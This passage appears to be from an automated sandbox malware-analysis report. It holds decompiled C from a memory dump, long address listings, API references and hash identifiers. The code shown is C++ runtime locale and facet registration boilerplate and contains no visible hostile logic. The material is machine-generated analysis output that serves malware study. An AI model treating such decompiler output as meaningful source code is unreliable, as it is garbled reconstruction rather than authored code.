																																			} else {
																																				_t678 = _t697;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t677 =  *(_t724 - 0x10);
																																		 *(_t724 - 0x10) = _t677;
																																		 *(_t724 - 4) = 1;
																																		E6E1911C1(__eflags, _t677);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
																																		 *0x6e2216fc = _t677;
																																		goto L68;
																																	}
																																} else {
																																	_t677 = _t696;
																																	goto L68;
																																}
																															}
																														} else {
																															_t676 =  *(_t724 - 0x10);
																															 *(_t724 - 0x10) = _t676;
																															 *(_t724 - 4) = 1;
																															E6E1911C1(__eflags, _t676);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
																															 *0x6e221700 = _t676;
																															goto L61;
																														}
																													} else {
																														_t676 = _t695;
																														goto L61;
																													}
																												}
																											} else {
																												_t675 =  *(_t724 - 0x10);
																												 *(_t724 - 0x10) = _t675;
																												 *(_t724 - 4) = 1;
																												E6E1911C1(__eflags, _t675);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t675 + 4))))();
																												 *0x6e22172c = _t675;
																												goto L54;
																											}
																										} else {
																											_t675 = _t694;
																											goto L54;
																										}
																									}
																								} else {
																									_t674 =  *(_t724 - 0x10);
																									 *(_t724 - 0x10) = _t674;
																									 *(_t724 - 4) = 1;
																									E6E1911C1(__eflags, _t674);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t674 + 4))))();
																									 *0x6e221730 = _t674;
																									goto L47;
																								}
																							} else {
																								_t674 = _t693;
																								goto L47;
																							}
																						}
																					} else {
																						_t673 =  *(_t724 - 0x10);
																						 *(_t724 - 0x10) = _t673;
																						 *(_t724 - 4) = 1;
																						E6E1911C1(__eflags, _t673);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t673 + 4))))();
																						 *0x6e2216f8 = _t673;
																						goto L40;
																					}
																				} else {
																					_t673 = _t692;
																					goto L40;
																				}
																			}
																		} else {
																			_t672 =  *(_t724 - 0x10);
																			 *(_t724 - 0x10) = _t672;
																			 *(_t724 - 4) = 1;
																			E6E1911C1(__eflags, _t672);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t672 + 4))))();
																			 *0x6e221728 = _t672;
																			goto L33;
																		}
																	} else {
																		_t672 = _t691;
																		goto L33;
																	}
																}
															} else {
																_t671 =  *(_t724 - 0x10);
																 *(_t724 - 0x10) = _t671;
																 *(_t724 - 4) = 1;
																E6E1911C1(__eflags, _t671);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t671 + 4))))();
																 *0x6e2216f4 = _t671;
																goto L26;
															}
														} else {
															_t671 = _t690;
															goto L26;
														}
													}
												} else {
													_t670 =  *(_t724 - 0x10);
													 *(_t724 - 0x10) = _t670;
													 *(_t724 - 4) = 1;
													E6E1911C1(__eflags, _t670);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t670 + 4))))();
													 *0x6e221724 = _t670;
													goto L19;
												}
											} else {
												_t670 = _t689;
												goto L19;
											}
										}
									} else {
										_t669 =  *(_t724 - 0x10);
										 *(_t724 - 0x10) = _t669;
										 *(_t724 - 4) = 1;
										E6E1911C1(__eflags, _t669);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t669 + 4))))();
										 *0x6e2216f0 = _t669;
										goto L12;
									}
								} else {
									_t669 = _t688;
									goto L12;
								}
							}
						} else {
							_t668 =  *(_t724 - 0x10);
							 *(_t724 - 0x10) = _t668;
							 *(_t724 - 4) = 1;
							E6E1911C1(__eflags, _t668);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t668 + 4))))();
							 *0x6e221720 = _t668;
							goto L5;
						}
					} else {
						_t668 = _t687;
						goto L5;
					}
				}
			}

0x6e198ecc
0x6e198ed3
0x6e198edd
0x6e198ee2
0x6e198eed
0x6e198ef1
0x6e198efd
0x6e198f02
0x6e198f06
0x6e198f4b
0x6e198f4e
0x6e198f5a
0x6e198f08
0x6e198f0a
0x6e198f10
0x6e198f16
0x6e198f1e
0x6e198f21
0x6e198f5b
0x6e198f60
0x6e198f68
0x6e198f72
0x6e198f77
0x6e198f82
0x6e198f86
0x6e198f97
0x6e198f99
0x6e198f9b
0x6e198fe0
0x6e198fe3
0x6e198fef
0x6e198f9d
0x6e198f9d
0x6e198f9f
0x6e198fa5
0x6e198fab
0x6e198fb3
0x6e198fb6
0x6e198ff0
0x6e198ff5
0x6e198ffd
0x6e199007
0x6e19900c
0x6e199017
0x6e19901b
0x6e19902c
0x6e19902e
0x6e199030
0x6e199075
0x6e199078
0x6e199084
0x6e199032
0x6e199032
0x6e199034
0x6e19903a
0x6e199040
0x6e199048
0x6e19904b
0x6e199085
0x6e19908a
0x6e199092
0x6e19909c
0x6e1990a1
0x6e1990ac
0x6e1990b0
0x6e1990c1
0x6e1990c3
0x6e1990c5
0x6e19910a
0x6e19910d
0x6e199119
0x6e1990c7
0x6e1990c7
0x6e1990c9
0x6e1990cf
0x6e1990d5
0x6e1990dd
0x6e1990e0
0x6e19911a
0x6e19911f
0x6e199127
0x6e199131
0x6e199136
0x6e199141
0x6e199145
0x6e199156
0x6e199158
0x6e19915a
0x6e19919f
0x6e1991a2
0x6e1991ae
0x6e19915c
0x6e19915c
0x6e19915e
0x6e199164
0x6e19916a
0x6e199172
0x6e199175
0x6e1991af
0x6e1991b4
0x6e1991bc
0x6e1991c6
0x6e1991cb
0x6e1991d6
0x6e1991da
0x6e1991eb
0x6e1991ed
0x6e1991ef
0x6e199234
0x6e199237
0x6e199243
0x6e1991f1
0x6e1991f1
0x6e1991f3
0x6e1991f9
0x6e1991ff
0x6e199207
0x6e19920a
0x6e199244
0x6e199249
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e199280
0x6e199282
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9
0x6e19904d
0x6e19904d
0x6e199050
0x6e199054
0x6e199058
0x6e199065
0x6e19906d
0x6e19906f
0x00000000
0x6e19906f
0x6e199036
0x6e199036
0x00000000
0x6e199036
0x6e199034
0x6e198fb8
0x6e198fb8
0x6e198fbb
0x6e198fbf
0x6e198fc3
0x6e198fd0
0x6e198fd8
0x6e198fda
0x00000000
0x6e198fda
0x6e198fa1
0x6e198fa1
0x00000000
0x6e198fa1
0x6e198f9f
0x6e198f23
0x6e198f23
0x6e198f26
0x6e198f2a
0x6e198f2e
0x6e198f3b
0x6e198f43
0x6e198f45
0x00000000
0x6e198f45
0x6e198f0c
0x6e198f0c
0x00000000
0x6e198f0c
0x6e198f0a

APIs

__EH_prolog3.LIBCMT ref: 6E198ED3
std::_Lockit::_Lockit.LIBCPMT ref: 6E198EDD

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

messages.LIBCPMT ref: 6E198F17
std::_Facet_Register.LIBCPMT ref: 6E198F2E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198F4E
Concurrency::cancel_current_task.LIBCPMT ref: 6E198F5B

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4019330243-0
Opcode ID: 6de3f493ff526fc793d4f53e1858f55a13c43a3aa6edb9841c1ea752d7fd7ed0
Instruction ID: 5e076aeb189553285414570725fcfbe19b921862a8ee4b366de0af7591399d3a
Opcode Fuzzy Hash: 6de3f493ff526fc793d4f53e1858f55a13c43a3aa6edb9841c1ea752d7fd7ed0
Instruction Fuzzy Hash: AC01C4359005199BCF05DBE4C814AFE77BABF84354F244809E825AB280CF749AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198F61, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E198F61(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t218;
				void* _t399;
				signed int _t578;
				void* _t630;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				signed int _t667;
				void* _t685;

				_t476 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t685 - 0x14, 0);
				_t650 =  *0x6e2216f0; // 0x0
				 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
				 *(_t685 - 0x10) = _t650;
				_t218 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(__ebx, 0x6e2216a4, __edi, _t650));
				_t632 = _t218;
				if(_t218 != 0) {
					L5:
					E6E18F30C(_t685 - 0x14);
					return E6E1A9D88(_t632);
				} else {
					if(_t650 == 0) {
						_push( *((intOrPtr*)(_t685 + 8)));
						_push(_t685 - 0x10);
						__eflags = E6E19AB6B(__ebx, _t632, _t650) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t476, _t632, _t650, 8);
							E6E18F2A5(_t685 - 0x14, 0);
							_t651 =  *0x6e221724; // 0x0
							 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
							 *(_t685 - 0x10) = _t651;
							_t633 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216d0, _t632, _t651));
							__eflags = _t633;
							if(_t633 != 0) {
								L12:
								E6E18F30C(_t685 - 0x14);
								return E6E1A9D88(_t633);
							} else {
								__eflags = _t651;
								if(_t651 == 0) {
									_push( *((intOrPtr*)(_t685 + 8)));
									_push(_t685 - 0x10);
									__eflags = E6E19ABD3(_t476, _t633, _t651) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t476, _t633, _t651, 8);
										E6E18F2A5(_t685 - 0x14, 0);
										_t652 =  *0x6e2216f4; // 0x0
										 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
										 *(_t685 - 0x10) = _t652;
										_t634 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216a8, _t633, _t652));
										__eflags = _t634;
										if(_t634 != 0) {
											L19:
											E6E18F30C(_t685 - 0x14);
											return E6E1A9D88(_t634);
										} else {
											__eflags = _t652;
											if(_t652 == 0) {
												_push( *((intOrPtr*)(_t685 + 8)));
												_push(_t685 - 0x10);
												__eflags = E6E19AC3B(_t476, _t634, _t652) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t476, _t634, _t652, 8);
													E6E18F2A5(_t685 - 0x14, 0);
													_t653 =  *0x6e221728; // 0x0
													 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
													 *(_t685 - 0x10) = _t653;
													_t635 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216d4, _t634, _t653));
													__eflags = _t635;
													if(_t635 != 0) {
														L26:
														E6E18F30C(_t685 - 0x14);
														return E6E1A9D88(_t635);
													} else {
														__eflags = _t653;
														if(_t653 == 0) {
															_push( *((intOrPtr*)(_t685 + 8)));
															_push(_t685 - 0x10);
															__eflags = E6E19ACA3(_t476, _t635, _t653) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t476, _t635, _t653, 8);
																E6E18F2A5(_t685 - 0x14, 0);
																_t654 =  *0x6e2216f8; // 0x0
																 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																 *(_t685 - 0x10) = _t654;
																_t636 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216ac, _t635, _t654));
																__eflags = _t636;
																if(_t636 != 0) {
																	L33:
																	E6E18F30C(_t685 - 0x14);
																	return E6E1A9D88(_t636);
																} else {
																	__eflags = _t654;
																	if(_t654 == 0) {
																		_push( *((intOrPtr*)(_t685 + 8)));
																		_push(_t685 - 0x10);
																		__eflags = E6E19AD0B(_t476, _t636, _t654) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t476, _t636, _t654, 8);
																			E6E18F2A5(_t685 - 0x14, 0);
																			_t655 =  *0x6e221730; // 0x0
																			 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																			 *(_t685 - 0x10) = _t655;
																			_t637 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216dc, _t636, _t655));
																			__eflags = _t637;
																			if(_t637 != 0) {
																				L40:
																				E6E18F30C(_t685 - 0x14);
																				return E6E1A9D88(_t637);
																			} else {
																				__eflags = _t655;
																				if(_t655 == 0) {
																					_push( *((intOrPtr*)(_t685 + 8)));
																					_push(_t685 - 0x10);
																					__eflags = E6E19AD73(_t476, _t637, _t655) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t476, _t637, _t655, 8);
																						E6E18F2A5(_t685 - 0x14, 0);
																						_t656 =  *0x6e22172c; // 0x0
																						 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																						 *(_t685 - 0x10) = _t656;
																						_t638 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216d8, _t637, _t656));
																						__eflags = _t638;
																						if(_t638 != 0) {
																							L47:
																							E6E18F30C(_t685 - 0x14);
																							return E6E1A9D88(_t638);
																						} else {
																							__eflags = _t656;
																							if(_t656 == 0) {
																								_push( *((intOrPtr*)(_t685 + 8)));
																								_push(_t685 - 0x10);
																								__eflags = E6E19ADF7(_t476, _t638, _t656) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t476, _t638, _t656, 8);
																									E6E18F2A5(_t685 - 0x14, 0);
																									_t657 =  *0x6e221700; // 0x0
																									 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																									 *(_t685 - 0x10) = _t657;
																									_t639 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216b4, _t638, _t657));
																									__eflags = _t639;
																									if(_t639 != 0) {
																										L54:
																										E6E18F30C(_t685 - 0x14);
																										return E6E1A9D88(_t639);
																									} else {
																										__eflags = _t657;
																										if(_t657 == 0) {
																											_push( *((intOrPtr*)(_t685 + 8)));
																											_push(_t685 - 0x10);
																											__eflags = E6E19AE7C(_t476, _t639, _t657) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t476, _t639, _t657, 8);
																												E6E18F2A5(_t685 - 0x14, 0);
																												_t658 =  *0x6e2216fc; // 0x0
																												 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																												 *(_t685 - 0x10) = _t658;
																												_t640 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216b0, _t639, _t658));
																												__eflags = _t640;
																												if(_t640 != 0) {
																													L61:
																													E6E18F30C(_t685 - 0x14);
																													return E6E1A9D88(_t640);
																												} else {
																													__eflags = _t658;
																													if(_t658 == 0) {
																														_push( *((intOrPtr*)(_t685 + 8)));
																														_push(_t685 - 0x10);
																														__eflags = E6E19AF00(_t476, _t640, _t658) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t476, _t640, _t658, 8);
																															E6E18F2A5(_t685 - 0x14, 0);
																															_t659 =  *0x6e221710; // 0x0
																															 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																															 *(_t685 - 0x10) = _t659;
																															_t641 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216bc, _t640, _t659));
																															__eflags = _t641;
																															if(_t641 != 0) {
																																L68:
																																E6E18F30C(_t685 - 0x14);
																																return E6E1A9D88(_t641);
																															} else {
																																__eflags = _t659;
																																if(_t659 == 0) {
																																	_push( *((intOrPtr*)(_t685 + 8)));
																																	_push(_t685 - 0x10);
																																	__eflags = E6E19AF85(_t476, _t641, _t659) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t476, _t641, _t659, 8);
																																		E6E18F2A5(_t685 - 0x14, 0);
																																		_t660 =  *0x6e2216e8; // 0x0
																																		 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																																		 *(_t685 - 0x10) = _t660;
																																		_t642 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e22169c, _t641, _t660));
																																		__eflags = _t642;
																																		if(_t642 != 0) {
																																			L75:
																																			E6E18F30C(_t685 - 0x14);
																																			return E6E1A9D88(_t642);
																																		} else {
																																			__eflags = _t660;
																																			if(_t660 == 0) {
																																				_push( *((intOrPtr*)(_t685 + 8)));
																																				_push(_t685 - 0x10);
																																				__eflags = E6E19AFED(_t476, _t642, _t660) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t476, _t642, _t660, 8);
																																					E6E18F2A5(_t685 - 0x14, 0);
																																					_t661 =  *0x6e221714; // 0x0
																																					 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																																					 *(_t685 - 0x10) = _t661;
																																					_t643 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216c0, _t642, _t661));
																																					__eflags = _t643;
																																					if(_t643 != 0) {
																																						L82:
																																						E6E18F30C(_t685 - 0x14);
																																						return E6E1A9D88(_t643);
																																					} else {
																																						__eflags = _t661;
																																						if(_t661 == 0) {
																																							_push( *((intOrPtr*)(_t685 + 8)));
																																							_push(_t685 - 0x10);
																																							__eflags = E6E19B055(_t476, _t643, _t661) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ec3ec, _t476, _t643, _t661, 8);
																																								E6E18F2A5(_t685 - 0x14, 0);
																																								_t662 =  *0x6e221718; // 0x0
																																								 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																																								 *(_t685 - 0x10) = _t662;
																																								_t644 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216c4, _t643, _t662));
																																								__eflags = _t644;
																																								if(_t644 != 0) {
																																									L89:
																																									E6E18F30C(_t685 - 0x14);
																																									return E6E1A9D88(_t644);
																																								} else {
																																									__eflags = _t662;
																																									if(_t662 == 0) {
																																										_push( *((intOrPtr*)(_t685 + 8)));
																																										_push(_t685 - 0x10);
																																										__eflags = E6E19B0BD(_t476, _t644, _t662) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E161CB5(__eflags);
																																											asm("int3");
																																											E6E1A9DBF(0x6e1ec3ec, _t476, _t644, _t662, 8);
																																											E6E18F2A5(_t685 - 0x14, 0);
																																											_t663 =  *0x6e221734; // 0x0
																																											 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																																											 *(_t685 - 0x10) = _t663;
																																											_t645 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216e0, _t644, _t663));
																																											__eflags = _t645;
																																											if(_t645 != 0) {
																																												L96:
																																												E6E18F30C(_t685 - 0x14);
																																												return E6E1A9D88(_t645);
																																											} else {
																																												__eflags = _t663;
																																												if(_t663 == 0) {
																																													_push( *((intOrPtr*)(_t685 + 8)));
																																													_push(_t685 - 0x10);
																																													__eflags = E6E19B138(_t476, _t645, _t663) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E161CB5(__eflags);
																																														asm("int3");
																																														E6E1A9DBF(0x6e1ec3ec, _t476, _t645, _t663, 8);
																																														E6E18F2A5(_t685 - 0x14, 0);
																																														_t664 =  *0x6e221704; // 0x0
																																														 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																																														 *(_t685 - 0x10) = _t664;
																																														_t646 = E6E162171( *((intOrPtr*)(_t685 + 8)), E6E161F29(_t476, 0x6e2216b8, _t645, _t664));
																																														__eflags = _t646;
																																														if(_t646 != 0) {
																																															L103:
																																															E6E18F30C(_t685 - 0x14);
																																															return E6E1A9D88(_t646);
																																														} else {
																																															__eflags = _t664;
																																															if(_t664 == 0) {
																																																_push( *((intOrPtr*)(_t685 + 8)));
																																																_push(_t685 - 0x10);
																																																__eflags = E6E19B1A4(_t476, _t646, _t664) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E161CB5(__eflags);
																																																	asm("int3");
																																																	E6E1A9DBF(0x6e1ec3ec, _t476, _t646, _t664, 8);
																																																	E6E18F2A5(_t685 - 0x14, 0);
																																																	_t665 =  *0x6e221738; // 0x0
